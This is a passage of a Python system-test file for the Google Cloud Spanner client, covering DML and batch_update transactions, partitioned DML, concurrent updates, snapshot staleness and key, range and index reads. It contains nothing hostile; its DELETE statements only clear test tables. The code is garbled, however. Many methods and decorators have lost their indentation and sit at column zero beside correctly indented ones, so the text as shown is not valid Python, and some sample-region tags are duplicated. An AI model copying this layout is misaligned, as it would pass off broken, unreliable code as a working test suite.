        retry(self._db.reload)()
        session = self._db.session()
        session.create()
        self.to_delete.append(session)
        with session.batch() as batch:
            batch.delete(self.TABLE, self.ALL)
        insert_statement = list(self._generate_insert_statements())[0]
        with session.transaction() as transaction:
            rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
            self.assertEqual(rows, [])
            # First row inserted via DML ...
            row_count = transaction.execute_update(insert_statement)
            self.assertEqual(row_count, 1)
            # ... remaining rows via a staged mutation, committed together.
            transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA[1:])
        rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
        self._check_rows_data(rows)
        # [END spanner_test_dml_update]
        # [END spanner_test_dml_with_mutation]
@staticmethod
def _check_batch_status(status_code, expected=code_pb2.OK):
if status_code != expected:
grpc_status_code = _STATUS_CODE_TO_GRPC_STATUS_CODE[status_code]
call = FauxCall(status_code)
raise exceptions.from_grpc_status(
grpc_status_code, "batch_update failed", errors=[call]
)
    def test_transaction_batch_update_success(self):
        """batch_update applies insert/update/delete statements atomically."""
        # [START spanner_test_dml_with_mutation]
        # [START spanner_test_dml_update]
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        session = self._db.session()
        session.create()
        self.to_delete.append(session)
        with session.batch() as batch:
            batch.delete(self.TABLE, self.ALL)
        insert_statement = list(self._generate_insert_statements())[0]
        # (sql, params, param_types) triples — the form batch_update accepts.
        update_statement = (
            "UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
            {"contact_id": 1, "email": "phreddy@example.com"},
            {"contact_id": param_types.INT64, "email": param_types.STRING},
        )
        delete_statement = (
            "DELETE contacts WHERE contact_id = @contact_id;",
            {"contact_id": 1},
            {"contact_id": param_types.INT64},
        )

        def unit_of_work(transaction, self):
            # Table starts empty; each statement then affects exactly one row.
            rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
            self.assertEqual(rows, [])
            status, row_counts = transaction.batch_update(
                [insert_statement, update_statement, delete_statement]
            )
            self._check_batch_status(status.code)
            self.assertEqual(len(row_counts), 3)
            for row_count in row_counts:
                self.assertEqual(row_count, 1)

        session.run_in_transaction(unit_of_work, self)
        # The inserted row was deleted again inside the batch: table is empty.
        rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
        self._check_rows_data(rows, [])
        # [END spanner_test_dml_with_mutation]
        # [END spanner_test_dml_update]
    def test_transaction_batch_update_and_execute_dml(self):
        """batch_update and execute_update can be mixed in one transaction."""
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        session = self._db.session()
        session.create()
        self.to_delete.append(session)
        with session.batch() as batch:
            batch.delete(self.TABLE, self.ALL)
        insert_statements = list(self._generate_insert_statements())
        update_statements = [
            (
                "UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
                {"contact_id": 1, "email": "phreddy@example.com"},
                {"contact_id": param_types.INT64, "email": param_types.STRING},
            )
        ]
        delete_statement = "DELETE contacts WHERE TRUE;"

        def unit_of_work(transaction, self):
            rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
            self.assertEqual(rows, [])
            # All inserts plus the update run as one batch ...
            status, row_counts = transaction.batch_update(
                insert_statements + update_statements
            )
            self._check_batch_status(status.code)
            self.assertEqual(len(row_counts), len(insert_statements) + 1)
            for row_count in row_counts:
                self.assertEqual(row_count, 1)
            # ... then a single DML statement deletes everything again.
            row_count = transaction.execute_update(delete_statement)
            self.assertEqual(row_count, len(insert_statements))

        session.run_in_transaction(unit_of_work, self)
        rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
        self._check_rows_data(rows, [])
    def test_transaction_batch_update_w_syntax_error(self):
        """A syntax error stops the batch; earlier statements still count."""
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        session = self._db.session()
        session.create()
        self.to_delete.append(session)
        with session.batch() as batch:
            batch.delete(self.TABLE, self.ALL)
        insert_statement = list(self._generate_insert_statements())[0]
        update_statement = (
            # "UPDTAE" is misspelled on purpose to provoke INVALID_ARGUMENT.
            "UPDTAE contacts SET email = @email " "WHERE contact_id = @contact_id;",
            {"contact_id": 1, "email": "phreddy@example.com"},
            {"contact_id": param_types.INT64, "email": param_types.STRING},
        )
        delete_statement = (
            "DELETE contacts WHERE contact_id = @contact_id;",
            {"contact_id": 1},
            {"contact_id": param_types.INT64},
        )

        def unit_of_work(transaction):
            rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
            self.assertEqual(rows, [])
            status, row_counts = transaction.batch_update(
                [insert_statement, update_statement, delete_statement]
            )
            # Execution halts at the bad statement: only the insert ran.
            self._check_batch_status(status.code, code_pb2.INVALID_ARGUMENT)
            self.assertEqual(len(row_counts), 1)
            self.assertEqual(row_counts[0], 1)

        session.run_in_transaction(unit_of_work)
def test_transaction_batch_update_wo_statements(self):
from google.api_core.exceptions import InvalidArgument
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.transaction() as transaction:
with self.assertRaises(InvalidArgument):
transaction.batch_update([])
@unittest.skipUnless(HAS_OPENTELEMETRY_INSTALLED, "trace requires OpenTelemetry")
def test_transaction_batch_update_w_parent_span(self):
from opentelemetry import trace
tracer = trace.get_tracer(__name__)
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
if HAS_OPENTELEMETRY_INSTALLED:
self.ot_exporter.clear() # Clear any ot spans from above steps.
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
with tracer.start_as_current_span("Test Span"):
session.run_in_transaction(unit_of_work, self)
span_list = self.ot_exporter.get_finished_spans()
self.assertEqual(len(span_list), 6)
self.assertEqual(
list(map(lambda span: span.name, span_list)),
[
"CloudSpanner.CreateSession",
"CloudSpanner.Commit",
"CloudSpanner.BeginTransaction",
"CloudSpanner.DMLTransaction",
"CloudSpanner.Commit",
"Test Span",
],
)
for span in span_list[2:-1]:
self.assertEqual(span.context.trace_id, span_list[-1].context.trace_id)
self.assertEqual(span.parent.span_id, span_list[-1].context.span_id)
def test_execute_partitioned_dml(self):
# [START spanner_test_dml_partioned_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
delete_statement = "DELETE FROM {} WHERE true".format(self.TABLE)
def _setup_table(txn):
txn.execute_update(delete_statement)
for insert_statement in self._generate_insert_statements():
txn.execute_update(insert_statement)
committed = self._db.run_in_transaction(_setup_table)
with self._db.snapshot(read_timestamp=committed) as snapshot:
before_pdml = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(before_pdml)
nonesuch = "nonesuch@example.com"
target = "phred@example.com"
update_statement = (
"UPDATE {table} SET {table}.email = @email " "WHERE {table}.email = @target"
).format(table=self.TABLE)
row_count = self._db.execute_partitioned_dml(
update_statement,
params={"email": nonesuch, "target": target},
param_types={"email": param_types.STRING, "target": param_types.STRING},
request_options=RequestOptions(
priority=RequestOptions.Priority.PRIORITY_MEDIUM
),
)
self.assertEqual(row_count, 1)
row = self.ROW_DATA[0]
updated = [row[:3] + (nonesuch,)] + list(self.ROW_DATA[1:])
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_update = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_update, updated)
row_count = self._db.execute_partitioned_dml(delete_statement)
self.assertEqual(row_count, len(self.ROW_DATA))
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_delete = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_delete, [])
# [END spanner_test_dml_partioned_dml_update]
def _transaction_concurrency_helper(self, unit_of_work, pkey):
INITIAL_VALUE = 123
NUM_THREADS = 3 # conforms to equivalent Java systest.
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, INITIAL_VALUE]]
)
# We don't want to run the threads' transactions in the current
# session, which would fail.
txn_sessions = []
for _ in range(NUM_THREADS):
txn_sessions.append(self._db)
threads = [
threading.Thread(
target=txn_session.run_in_transaction, args=(unit_of_work, pkey)
)
for txn_session in txn_sessions
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
with self._db.snapshot() as snapshot:
keyset = KeySet(keys=[(pkey,)])
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
_, value = rows[0]
self.assertEqual(value, INITIAL_VALUE + len(threads))
def _read_w_concurrent_update(self, transaction, pkey):
keyset = KeySet(keys=[(pkey,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_read_w_concurrent_updates(self):
pkey = "read_w_concurrent_updates"
self._transaction_concurrency_helper(self._read_w_concurrent_update, pkey)
def _query_w_concurrent_update(self, transaction, pkey):
sql = "SELECT * FROM counters WHERE name = @name"
rows = list(
transaction.execute_sql(
sql, params={"name": pkey}, param_types={"name": param_types.STRING}
)
)
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_query_w_concurrent_updates(self):
pkey = "query_w_concurrent_updates"
self._transaction_concurrency_helper(self._query_w_concurrent_update, pkey)
    @unittest.skipIf(USE_EMULATOR, "Skipping concurrent transactions")
    def test_transaction_read_w_abort(self):
        """Aborted transactions are retried; both counters end up incremented.

        ``trigger`` coordinates two threads so that the handler's transaction
        is aborted by the provoker and must be retried by run_in_transaction.
        """
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        trigger = _ReadAbortTrigger()
        with self._db.batch() as batch:
            batch.delete(COUNTERS_TABLE, self.ALL)
            batch.insert(
                COUNTERS_TABLE, COUNTERS_COLUMNS, [[trigger.KEY1, 0], [trigger.KEY2, 0]]
            )
        provoker = threading.Thread(target=trigger.provoke_abort, args=(self._db,))
        handler = threading.Thread(target=trigger.handle_abort, args=(self._db,))
        # Order matters: the provoker must be underway before the handler
        # starts, and the handler must finish before the threads are joined.
        provoker.start()
        trigger.provoker_started.wait()
        handler.start()
        trigger.handler_done.wait()
        provoker.join()
        handler.join()
        with self._db.snapshot() as snapshot:
            rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
        self._check_row_data(rows, expected=[[trigger.KEY1, 1], [trigger.KEY2, 1]])
@staticmethod
def _row_data(max_index):
for index in range(max_index):
yield (
index,
"First%09d" % (index,),
"Last%09d" % (max_index - index),
"test-%09d@example.com" % (index,),
)
def _set_up_table(self, row_count, database=None):
if database is None:
database = self._db
retry = RetryInstanceState(_has_all_ddl)
retry(database.reload)()
def _unit_of_work(transaction, test):
transaction.delete(test.TABLE, test.ALL)
transaction.insert(test.TABLE, test.COLUMNS, test._row_data(row_count))
committed = database.run_in_transaction(_unit_of_work, test=self)
return committed
def test_read_with_single_keys_index(self):
# [START spanner_test_single_key_index_read]
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
row = 5
keyset = [[expected[row][0], expected[row][1]]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [expected[row]])
# [END spanner_test_single_key_index_read]
def test_empty_read_with_single_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
keyset = [["Non", "Existent"]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [])
def test_read_with_multiple_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, KeySet(keys=expected), index="name")
)
self.assertEqual(rows, expected)
    def test_snapshot_read_w_various_staleness(self):
        """Every snapshot staleness mode returns the full committed data set."""
        from datetime import datetime

        from google.cloud._helpers import UTC

        row_count = 400
        committed = self._set_up_table(row_count)
        all_data_rows = list(self._row_data(row_count))
        # Capture a bound *before* the reads so the staleness computed below
        # is guaranteed to cover the commit.
        before_reads = datetime.utcnow().replace(tzinfo=UTC)
        # Test w/ read timestamp
        with self._db.snapshot(read_timestamp=committed) as read_tx:
            rows = list(read_tx.read(self.TABLE, self.COLUMNS, self.ALL))
            self._check_row_data(rows, all_data_rows)
        # Test w/ min read timestamp
        with self._db.snapshot(min_read_timestamp=committed) as min_read_ts:
            rows = list(min_read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
            self._check_row_data(rows, all_data_rows)
        staleness = datetime.utcnow().replace(tzinfo=UTC) - before_reads
        # Test w/ max staleness
        with self._db.snapshot(max_staleness=staleness) as max_staleness:
            rows = list(max_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
            self._check_row_data(rows, all_data_rows)
        # Test w/ exact staleness
        with self._db.snapshot(exact_staleness=staleness) as exact_staleness:
            rows = list(exact_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
            self._check_row_data(rows, all_data_rows)
        # Test w/ strong
        with self._db.snapshot() as strong:
            rows = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
            self._check_row_data(rows, all_data_rows)
    def test_multiuse_snapshot_read_isolation_strong(self):
        """A multi-use strong snapshot keeps its view despite later deletes."""
        row_count = 40
        self._set_up_table(row_count)
        all_data_rows = list(self._row_data(row_count))
        with self._db.snapshot(multi_use=True) as strong:
            # First read pins the snapshot's read timestamp.
            before = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
            self._check_row_data(before, all_data_rows)
            # Delete everything *after* the snapshot's timestamp was pinned.
            with self._db.batch() as batch:
                batch.delete(self.TABLE, self.ALL)
            # The snapshot still sees the original rows.
            after = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
            self._check_row_data(after, all_data_rows)
    def test_multiuse_snapshot_read_isolation_read_timestamp(self):
        """A read-timestamp snapshot keeps its view despite later deletes."""
        row_count = 40
        committed = self._set_up_table(row_count)
        all_data_rows = list(self._row_data(row_count))
        with self._db.snapshot(read_timestamp=committed, multi_use=True) as read_ts:
            before = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
            self._check_row_data(before, all_data_rows)
            # Delete everything after the snapshot's fixed timestamp.
            with self._db.batch() as batch:
                batch.delete(self.TABLE, self.ALL)
            # The snapshot still reads as of ``committed``.
            after = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
            self._check_row_data(after, all_data_rows)
    def test_multiuse_snapshot_read_isolation_exact_staleness(self):
        """An exact-staleness snapshot keeps its view despite later deletes."""
        row_count = 40
        self._set_up_table(row_count)
        all_data_rows = list(self._row_data(row_count))
        # Sleep so that "now - 1ms" is safely after the populating commit.
        time.sleep(1)
        delta = datetime.timedelta(microseconds=1000)
        with self._db.snapshot(exact_staleness=delta, multi_use=True) as exact:
            before = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
            self._check_row_data(before, all_data_rows)
            # Delete everything after the stale timestamp was pinned.
            with self._db.batch() as batch:
                batch.delete(self.TABLE, self.ALL)
            after = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
            self._check_row_data(after, all_data_rows)
    def test_read_w_index(self):
        """Reading via a secondary index returns rows in index (not PK) order."""
        row_count = 2000
        # Indexed reads cannot return non-indexed columns
        MY_COLUMNS = self.COLUMNS[0], self.COLUMNS[2]
        EXTRA_DDL = ["CREATE INDEX contacts_by_last_name ON contacts(last_name)"]
        # A dedicated database is created so the extra index DDL does not
        # leak into the shared test database.
        pool = BurstyPool(labels={"testcase": "read_w_index"})
        ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
        temp_db = Config.INSTANCE.database(
            "test_read" + unique_resource_id("_"),
            ddl_statements=ddl_statements + EXTRA_DDL,
            pool=pool,
        )
        operation = temp_db.create()
        self.to_delete.append(_DatabaseDropper(temp_db))
        # We want to make sure the operation completes.
        operation.result(
            SPANNER_OPERATION_TIMEOUT_IN_SECONDS
        )  # raises on failure / timeout.
        committed = self._set_up_table(row_count, database=temp_db)
        with temp_db.snapshot(read_timestamp=committed) as snapshot:
            rows = list(
                snapshot.read(
                    self.TABLE, MY_COLUMNS, self.ALL, index="contacts_by_last_name"
                )
            )
        # _row_data generates last names in descending order, so the indexed
        # read comes back in reverse of primary-key order.
        expected = list(
            reversed([(row[0], row[2]) for row in self._row_data(row_count)])
        )
        self._check_rows_data(rows, expected)
def test_read_w_single_key(self):
# [START spanner_test_single_key_read]
row_count = 40
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(0,)])))
all_data_rows = list(self._row_data(row_count))
expected = [all_data_rows[0]]
self._check_row_data(rows, expected)
# [END spanner_test_single_key_read]
def test_empty_read(self):
# [START spanner_test_empty_read]
row_count = 40
self._set_up_table(row_count)
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(40,)])))
self._check_row_data(rows, [])
# [END spanner_test_empty_read]
def test_read_w_multiple_keys(self):
row_count = 40
indices = [0, 5, 17]
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE,
self.COLUMNS,
KeySet(keys=[(index,) for index in indices]),
)
)
all_data_rows = list(self._row_data(row_count))
expected = [row for row in all_data_rows if row[0] in indices]
self._check_row_data(rows, expected)
def test_read_w_limit(self):
row_count = 3000
limit = 100
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL, limit=limit))
all_data_rows = list(self._row_data(row_count))
expected = all_data_rows[:limit]
self._check_row_data(rows, expected)
    def test_read_w_ranges(self):
        """All four open/closed KeyRange bound combinations slice correctly."""
        row_count = 3000
        start = 1000
        end = 2000
        committed = self._set_up_table(row_count)
        # One multi-use snapshot serves all five range reads below.
        with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
            all_data_rows = list(self._row_data(row_count))
            # Single-row range: [start, start+1)
            single_key = KeyRange(start_closed=[start], end_open=[start + 1])
            keyset = KeySet(ranges=(single_key,))
            rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
            expected = all_data_rows[start : start + 1]
            self._check_rows_data(rows, expected)
            # [start, end] — both bounds inclusive.
            closed_closed = KeyRange(start_closed=[start], end_closed=[end])
            keyset = KeySet(ranges=(closed_closed,))
            rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
            expected = all_data_rows[start : end + 1]
            self._check_row_data(rows, expected)
            # [start, end) — exclusive upper bound.
            closed_open = KeyRange(start_closed=[start], end_open=[end])
            keyset = KeySet(ranges=(closed_open,))
            rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
            expected = all_data_rows[start:end]
            self._check_row_data(rows, expected)
            # (start, end) — both bounds exclusive.
            open_open = KeyRange(start_open=[start], end_open=[end])
            keyset = KeySet(ranges=(open_open,))
            rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
            expected = all_data_rows[start + 1 : end]
            self._check_row_data(rows, expected)
            # (start, end] — exclusive lower bound.
            open_closed = KeyRange(start_open=[start], end_closed=[end])
            keyset = KeySet(ranges=(open_closed,))
            rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
            expected = all_data_rows[start + 1 : end + 1]
            self._check_row_data(rows, expected)
    def test_read_partial_range_until_end(self):
        """Ranges with an empty *end* key read from ``start`` onward.

        Per ``expected_map``, an empty end key combined with an "open" end
        bound yields no rows; with a "closed" end bound it reads to the end
        of the table.
        """
        row_count = 3000
        start = 1000
        committed = self._set_up_table(row_count)
        with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
            all_data_rows = list(self._row_data(row_count))
            expected_map = {
                ("start_closed", "end_closed"): all_data_rows[start:],
                ("start_closed", "end_open"): [],
                ("start_open", "end_closed"): all_data_rows[start + 1 :],
                ("start_open", "end_open"): [],
            }
            for start_arg in ("start_closed", "start_open"):
                for end_arg in ("end_closed", "end_open"):
                    # Empty list as the end key means "no explicit end".
                    range_kwargs = {start_arg: [start], end_arg: []}
                    keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
                    rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
                    expected = expected_map[(start_arg, end_arg)]
                    self._check_row_data(rows, expected)
def test_read_partial_range_from_beginning(self):
row_count = 3000
end = 2000
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[: end + 1],
("start_closed", "end_open"): all_data_rows[:end],
("start_open", "end_closed"): [],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [], end_arg: [end]}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_with_range_keys_index_single_key(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start = 3
krange = KeyRange(start_closed=data[start], end_open=data[start + 1])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : start + 1])
def test_read_with_range_keys_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : end + 1])
def test_read_with_range_keys_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start:end])
def test_read_with_range_keys_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end + 1])
def test_read_with_range_keys_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end])
def test_read_with_range_keys_index_limit_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start:end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_and_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_closed = KeyRange(start_closed=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_open = KeyRange(start_closed=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start:end]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_closed = KeyRange(start_open=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_open = KeyRange(start_open=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end]
self.assertEqual(rows, expected)
def test_partition_read_w_index(self):
    """Partitioned (batch) read over a secondary index returns all rows."""
    row_count = 10
    columns = self.COLUMNS[1], self.COLUMNS[2]
    committed = self._set_up_table(row_count)
    expected = [[row[1], row[2]] for row in self._row_data(row_count)]
    union = []
    batch_txn = self._db.batch_snapshot(read_timestamp=committed)
    batches = batch_txn.generate_read_batches(
        self.TABLE, columns, KeySet(all_=True), index="name"
    )
    for batch in batches:
        p_results_iter = batch_txn.process(batch)
        union.extend(list(p_results_iter))
    self.assertEqual(union, expected)
    batch_txn.close()
def test_execute_sql_w_manual_consume(self):
    """A fully drained streamed result set leaves no buffered row/chunk."""
    row_count = 3000
    committed = self._set_up_table(row_count)
    with self._db.snapshot(read_timestamp=committed) as snapshot:
        streamed = snapshot.execute_sql(self.SQL)
    keyset = KeySet(all_=True)
    with self._db.snapshot(read_timestamp=committed) as snapshot:
        rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
    self.assertEqual(list(streamed), rows)
    # After full consumption the stream's internal buffers must be empty.
    self.assertEqual(streamed._current_row, [])
    self.assertEqual(streamed._pending_chunk, None)
def _check_sql_results(
    self, database, sql, params, param_types, expected, order=True
):
